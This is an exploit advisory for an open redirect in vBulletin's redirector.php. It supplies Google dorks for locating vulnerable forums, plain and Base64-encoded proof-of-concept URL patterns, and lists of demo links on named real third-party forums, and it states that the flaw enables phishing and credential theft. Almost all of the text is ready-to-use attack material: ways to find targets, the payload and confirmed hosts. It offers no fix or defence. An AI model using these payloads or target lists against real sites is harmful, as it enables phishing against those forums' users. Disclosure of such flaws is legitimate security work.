[+] Title: vBulletin 3.x.x & 4.2.x Open Redirect Vulnerability [+] Date: 2018-01-24 [+] Author: Mostafa Gharzi [+] Vendor Homepage: www.vBulletin.com [+] Tested on: Windows 10 & Kali Linux [+] Vulnerable Parameter: Get Method [+] Vulnerable File: /redirector.php?url= /redirector.php?do=nodelay&url= [+] Dorks : inurl:/redirector.php?url= intext:"Powered by vBulletin® Version" ### Notes: [+] Unvalidated Redirects vulnerability in vBulletin 3.x.x and 4.2.x , allows when application accepts untrusted input that could cause the web application to redirect the request to a URL contained within an untrusted input. By modifying untrusted URLs into a malicious site, an attacker can successfully launch a phishing and steal user credentials. ### POC-I: [+} http://vB-Forum/redirector.php?url=[URL] [+} http://vB-Forum/redirector.php?do=nodelay&url=[URL] ### Demo-I: [+] http://www.alnhdi.net/vb/redirector.php?url=https://www.google.com/ [+] http://hondasquad.com/forum/redirector.php?url=https://google.com/ [+] http://warezhr.org/forum/redirector.php?url=https://google.com/ [+] http://duckload.ws/forum/redirector.php?url=https://google.com/ [+] http://tvoya-stroika.com/redirector.php?url=https://google.com/ [+] http://kadago.de/forum/redirector.php?url=https://google.com/ [+] http://nadi-mahasen.com/vb/redirector.php?do=nodelay&url=https://google.com/ ### In some versions; URL Encoded by Base64: [+] Example: https://www.google.com/ ==> Base64 Algorithm ==> aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8= ### POC-II: [+} http://vB-Forum/redirector.php?url=[URL Encoded by Base64] [+} http://vB-Forum/redirector.php?do=nodelay&url=[URL Encoded by Base64] ### Demo-II: [+] http://forums.corsairs-harbour.ru/redirector.php?url=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8= [+] http://tune-g.ru/forum/redirector.php?do=nodelay&url=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8= [+] http://tune-g.ru/forum/redirector.php?url=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8= ### Special Thanks: [+] CertCC.ir [+] Gucert.ir